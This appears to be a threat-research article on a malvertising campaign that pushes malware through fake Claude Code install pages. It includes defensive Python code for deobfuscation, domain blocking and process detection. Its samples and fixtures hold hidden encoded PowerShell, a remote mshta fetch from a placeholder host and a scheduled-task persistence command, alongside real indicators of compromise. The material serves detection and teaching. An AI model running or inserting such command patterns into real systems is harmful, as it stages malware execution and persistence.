A sophisticated malware distribution campaign dubbed InstallFix is using fake Claude AI installation pages, promoted through paid Google Ads, to trick users into executing multi-stage malware on their own Windows and macOS systems. Documented by Trend Micro researchers, the campaign exploits the trust users place in AI brand names and the credibility of sponsored search results, targeting both technical developers and non-technical users across the United States, Malaysia, the Netherlands, and Thailand.
The Attack Begins with a Fake Google Ad
When a user searches for terms like “Claude Code” or “Claude Code install,” a sponsored advertisement appears at the very top of Google search results, visually indistinguishable from a legitimate link. One click lands the user on a fraudulent site that closely mimics an official Claude AI installation guide, complete with step-by-step instructions and operating system-specific commands presented in a format that looks entirely authentic.
This technique, known as malvertising, is particularly effective because users have been conditioned to trust prominent search results and professional-looking documentation pages. The attackers targeted Claude Code in particular because its developer audience is already accustomed to pasting terminal commands from documentation, which lowers the psychological barrier to executing one more.
ClickFix: Social Engineering Meets Malware Delivery
The fraudulent pages use a technique called ClickFix, which presents a required installation command framed as a necessary setup step. On Windows, executing the provided command triggers a hidden attack chain beginning with mshta.exe, the signed, Microsoft-supplied HTML Application host that threat actors have long abused as a living-off-the-land binary to fetch and execute remote script content: a trusted system binary rarely trips controls that only look at the process image.
The downloaded file is named claude.msixbundle and carries valid Microsoft Marketplace signatures, allowing it to pass many automated security reviews. Embedded inside the package is an HTA payload containing obfuscated VBScript. The HTA window is resized to zero pixels so nothing appears on screen during execution. The VBScript then launches the 32-bit PowerShell binary from the SysWOW64 directory, reconstructing the word "powershell" at runtime from split variables so that string-based detection rules looking for the literal never see it.
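The split-variable trick described above is cheap to undo once the script is in hand. The following is an added example, not code from the article or from Trend Micro's analysis: a small Python resolver that walks a VBScript snippet, folds string literals, Chr() calls and previously assigned variables together, and reports any WScript.Shell Run call that ends up starting PowerShell hidden or with an encoded command. The sample script, the variable names, and the encoded argument (UTF-16LE "IEX", a harmless placeholder) are all constructed for the demonstration; the campaign's real HTA is not reproduced here.

```python
import re

# Constructed VBScript sample modelled on the technique the article describes
# (NOT the campaign's real payload): "powershell" never appears as a literal,
# and the Run call's second argument 0 keeps the window hidden.
SAMPLE_VBS = r'''
Dim p1, p2, p3
p1 = "pow"
p2 = "er" & "sh"
p3 = "ell"
cmd = p1 & p2 & p3 & " -w hidden -ep bypass -enc SQBFAFgA"
Set sh = CreateObject("WScript.Shell")
sh.Run cmd, 0, False
'''

ASSIGN_RE = re.compile(r'^([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
RUN_RE = re.compile(r'^\w+\.Run\s+(.+?)(?:\s*,\s*(\d+))?(?:\s*,\s*(?:True|False))?\s*$',
                    re.IGNORECASE)
STRING_RE = re.compile(r'^"((?:[^"]|"")*)"$')
CHR_RE = re.compile(r'^Chr\((\d+)\)$', re.IGNORECASE)


def split_concat(expr):
    """Split a VBScript expression on '&' operators that sit outside string literals."""
    tokens, cur, in_str = [], [], False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        if ch == '&' and not in_str:
            tokens.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    tokens.append("".join(cur).strip())
    return [t for t in tokens if t]


def eval_expr(expr, env):
    """Resolve literals, Chr(n) calls and already-assigned variables; anything
    else is left as <name> so the analyst can see what did not resolve."""
    out = []
    for tok in split_concat(expr):
        if (m := STRING_RE.match(tok)):
            out.append(m.group(1).replace('""', '"'))
        elif (m := CHR_RE.match(tok)):
            out.append(chr(int(m.group(1))))
        else:
            out.append(env.get(tok, f"<{tok}>"))
    return "".join(out)


def deobfuscate(script):
    """Single pass over simple assignments only (no If/loops): build the variable
    table and collect every WScript.Shell Run call as (resolved command, window style)."""
    env, runs = {}, []
    for raw in script.splitlines():
        line = raw.strip()
        low = line.lower()
        if not line or low.startswith(("dim ", "set ", "if ", "'")):
            continue  # declarations, object creation, branches and comments carry no strings of interest
        if (m := RUN_RE.match(line)):
            runs.append((eval_expr(m.group(1), env), m.group(2)))
        elif (m := ASSIGN_RE.match(line)):
            env[m.group(1)] = eval_expr(m.group(2), env)
    return env, runs


def suspicious_runs(runs):
    """Flag Run calls that start PowerShell with a hidden window (style 0) or an
    encoded/hidden command line, the combination the article attributes to the stager."""
    hits = []
    for cmdline, style in runs:
        low = cmdline.lower()
        if low.startswith("powershell") and (style == "0" or "-enc" in low or "-w hidden" in low):
            hits.append(cmdline)
    return hits


if __name__ == "__main__":
    env, runs = deobfuscate(SAMPLE_VBS)
    for name, value in env.items():
        print(f"{name} = {value!r}")
    for cmdline in suspicious_runs(runs):
        print("SUSPICIOUS:", cmdline)
```

Running it prints the resolved `cmd` variable with the reassembled word "powershell" at the front and flags the Run call. Real samples add further layers (Replace(), StrReverse(), Execute of a decoded blob), so treat this as the first pass of a triage workflow rather than a complete decoder.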
Per-Victim Command and Control Infrastructure
One of the most technically sophisticated aspects of the InstallFix campaign is its per-victim command-and-control architecture. The stager generates a unique machine identifier by hashing the computer name and username together, then constructs a victim-specific URL on attacker-controlled infrastructure at oakenfjrod[.]ru. Each compromised machine fetches its final payload from a unique subdomain, so an exact-match blocklist built from hostnames seen on earlier victims never covers the next one (a rule that blocks the parent domain together with all of its subdomains still does), and the operators can track individual infections with precision.
This architecture also provides the operators with operational flexibility: they can serve different final payloads to different victim categories, expire URLs after use to frustrate forensic analysis, and maintain visibility into which specific machines have been successfully compromised.
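To make the blocking consequence concrete, here is an added example (not the campaign's code and not from Trend Micro's write-up). It models the per-victim naming with a stand-in identifier and then compares two ways a defender might consume the oakenfjrod[.]ru indicator: an exact-match hostname list, which misses every victim it has not already seen, and parent-domain (suffix) matching, which covers all of them. The hashing scheme is an assumption: the article only says the computer name and username are hashed together, so SHA-256 over a "COMPUTER|user" string, truncated, is used purely to produce distinct labels. The victim machines are constructed.

```python
import hashlib

# Parent C2 domain reported by Trend Micro (shown defanged in the article text).
C2_PARENT = "oakenfjrod.ru"


def victim_id(computer_name, user_name):
    """ASSUMPTION: the real stager's hash algorithm, input ordering and encoding
    are not published. SHA-256 over "COMPUTER|user", truncated to 16 hex chars,
    stands in for it here solely to produce a distinct label per machine."""
    material = f"{computer_name.upper()}|{user_name.lower()}".encode()
    return hashlib.sha256(material).hexdigest()[:16]


def victim_c2_host(computer_name, user_name):
    """Victim-unique subdomain under the shared parent, as the article describes."""
    return f"{victim_id(computer_name, user_name)}.{C2_PARENT}"


def blocked_exact(host, blocklist):
    """Exact FQDN matching, e.g. a list of hostnames pasted into a firewall object."""
    return host.lower().rstrip(".") in blocklist


def blocked_suffix(host, blocklist):
    """Parent-domain matching: block a name if it or any ancestor domain is listed.
    This is the shape a DNS-filtering / RPZ rule for this campaign should take."""
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


def coverage(hosts, blocklist):
    """Return (hosts caught by exact matching, hosts caught by suffix matching)."""
    exact = sum(blocked_exact(h, blocklist) for h in hosts)
    suffix = sum(blocked_suffix(h, blocklist) for h in hosts)
    return exact, suffix


# Constructed victims; the point is only that each yields a different hostname.
VICTIMS = [("DESKTOP-A1B2C3", "alice"), ("WIN-DEV-07", "bob"), ("LAPTOP-9Z8Y", "carol")]
BLOCKLIST = {C2_PARENT}

if __name__ == "__main__":
    hosts = [victim_c2_host(c, u) for c, u in VICTIMS]
    for h in hosts:
        print(h)
    print("exact / suffix coverage with parent domain only:", coverage(hosts, BLOCKLIST))
    # Adding one observed victim hostname helps exact matching for that victim alone.
    print("after adding first observed host:", coverage(hosts, BLOCKLIST | {hosts[0]}))
```

The second print shows the trap: each hostname you add to an exact-match list protects exactly one machine that is already compromised, while the suffix rule needs only the parent domain. Suffix matching also does not over-block look-alikes such as `oakenfjrod.ru.example.com`, because it compares whole label suffixes rather than substrings.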
Persistence, Data Theft, and RedLine Stealer Connections
Once the final shellcode executes entirely in memory, the malware establishes persistence by creating scheduled tasks, ensuring it survives system reboots and continues operating silently in the background. Dynamic analysis by Trend Micro researchers confirmed the malware making outbound connections to attacker-controlled servers, collecting browser credential data, and targeting e-wallet applications installed on the infected machine.
The indicators of compromise tied to this campaign, including infrastructure patterns, obfuscation techniques, and payload behavior, align closely with those associated with RedLine Stealer campaigns documented since 2023. RedLine Stealer is a well-established information-stealing malware family sold as a service on cybercriminal forums, capable of harvesting passwords, cookies, credit card data, cryptocurrency wallet credentials, and VPN session tokens.
Why AI Brand Lures Are Especially Dangerous
The use of Claude AI as a lure reflects a broader trend in which threat actors rapidly adapt their social engineering to exploit interest in new and popular technologies. As AI tools gain mainstream adoption, more users are actively searching for installation guides, which creates a predictable and exploitable search pattern that malvertising campaigns can efficiently intercept.
Unlike phishing emails that arrive unsolicited, malvertising attacks intercept users at the moment of active intent: when they are already seeking the exact product being impersonated. This makes the deception considerably harder to detect and resist compared to unsolicited communication.
Indicators of Compromise
Key indicators published by Trend Micro for the InstallFix campaign include the domain download-version[.]1-5-8[.]com hosting the malicious installer, the C2 domain oakenfjrod[.]ru with victim-unique subdomains for payload delivery, and outbound connections to IP addresses 104[.]21[.]0[.]95, 185[.]177[.]239[.]255, and 77[.]91[.]97[.]244. The SHA-256 hash of the recovered Stage 5 payload is 2f04ba77bb841111036b979fc0dab7fcbae99749718ae1dd6fd348d4495b5f74.
Recommended Mitigations
Organizations and individuals can reduce exposure to campaigns like InstallFix through several practical measures:
- Block known malicious domains and IP addresses at the firewall and DNS filtering layers, including oakenfjrod[.]ru and download-version[.]1-5-8[.]com; write the C2 rule against the parent domain so that the victim-unique subdomains are covered as well
- Restrict or monitor the use of mshta.exe and similar dual-use Windows scripting tools in environments where they are not operationally required
- Train users never to run commands copied from websites reached via sponsored search results, and to always verify installer sources against official vendor domains
- Prefer trusted package managers such as npm, pip, brew, or winget over manual script execution from third-party pages, and check the package name against the vendor's official documentation first
- Deploy application control or allowlisting policies that prevent execution of unexpected MSIX packages; because the InstallFix bundle carried a valid signature, key the policy on the expected publisher and package identity rather than on the mere presence of a signature
- Monitor for suspicious scheduled task creation, which the malware uses to maintain persistence across reboots
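The two monitoring recommendations above (mshta.exe abuse and scheduled-task persistence) and the execution chain from the ClickFix section map onto a handful of process-creation rules. The following is an added example, not the article's or Trend Micro's detection content: Python rules run over constructed process-creation records in the shape of Sysmon Event ID 1 fields (Image, ParentImage, CommandLine, ProcessId, ParentProcessId), plus a parent-walk that reconstructs the mshta.exe to PowerShell to schtasks.exe lineage for an alert. The rule names, the sample events, the task name and paths in them, and the heuristic that 32-bit PowerShell under SysWOW64 is worth flagging are all this example's own assumptions; tune the rules against your own baseline before deploying them.

```python
# Constructed process-creation events mirroring Sysmon Event ID 1 fields.
# They are NOT real telemetry; pids, paths and the task name are made up.
EVENTS = [
    {"ProcessId": 4120, "ParentProcessId": 1880,
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://installer.example/claude-setup"},
    {"ProcessId": 4188, "ParentProcessId": 4120,
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -w hidden -ep bypass -enc SQBFAFgA"},
    {"ProcessId": 4202, "ParentProcessId": 4188,
     "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"schtasks /create /sc onlogon /tn Updater /tr C:\Users\alice\AppData\Roaming\upd.exe /f"},
    # Benign noise: an admin shell and a vendor help file opened locally.
    {"ProcessId": 5000, "ParentProcessId": 1880,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -NoProfile -Command Get-ChildItem"},
    {"ProcessId": 5100, "ParentProcessId": 1880,
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}


def basename(path):
    """Last path component, lower-cased, so rules compare image names not full paths."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of rule names (this example's own names) that match one event."""
    img = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"].lower()
    hits = []
    if img == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
        hits.append("mshta_remote_content")           # HTA host pulling a remote script
    if img == "powershell.exe" and parent in SCRIPT_HOSTS:
        hits.append("script_host_spawned_powershell")  # the mshta -> PowerShell hand-off
    if img == "powershell.exe" and "\\syswow64\\" in event["Image"].lower():
        hits.append("wow64_powershell")                # heuristic: 32-bit PowerShell on a 64-bit host
    if img == "powershell.exe" and ("-enc" in cmd or "-w hidden" in cmd or "-windowstyle hidden" in cmd):
        hits.append("hidden_or_encoded_powershell")
    if img == "schtasks.exe" and "/create" in cmd and parent in SCRIPT_HOSTS | {"powershell.exe"}:
        hits.append("scripted_scheduled_task_persistence")
    return hits


def scan(events):
    """Map ProcessId -> matched rules for every event that matched at least one rule."""
    findings = {}
    for ev in events:
        hits = evaluate(ev)
        if hits:
            findings[ev["ProcessId"]] = hits
    return findings


def lineage(events, pid):
    """Walk ParentProcessId links back to the oldest ancestor we have a record for,
    returning image names root-first; the first parent outside the log is taken from ParentImage."""
    by_pid = {e["ProcessId"]: e for e in events}
    chain, seen = [], set()
    ev = by_pid.get(pid)
    while ev is not None and ev["ProcessId"] not in seen:
        seen.add(ev["ProcessId"])
        chain.append(basename(ev["Image"]))
        parent = by_pid.get(ev["ParentProcessId"])
        if parent is None:
            chain.append(basename(ev["ParentImage"]))
        ev = parent
    return list(reversed(chain))


if __name__ == "__main__":
    for pid, rules in scan(EVENTS).items():
        print(pid, " -> ".join(lineage(EVENTS, pid)), rules)
```

Only the three events of the constructed chain fire; the interactive PowerShell session and the locally opened HTA do not. The lineage output for the schtasks.exe event reads `explorer.exe -> mshta.exe -> powershell.exe -> schtasks.exe`, which is the one-line context an analyst wants on the alert.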
The InstallFix campaign demonstrates that threat actors are investing heavily in campaigns that meet users where they are: in search results, on documentation-styled pages, and at the moment of downloading tools they actively want. Vigilance at the point of installation, rather than solely at the point of detection, is increasingly critical to preventing compromise.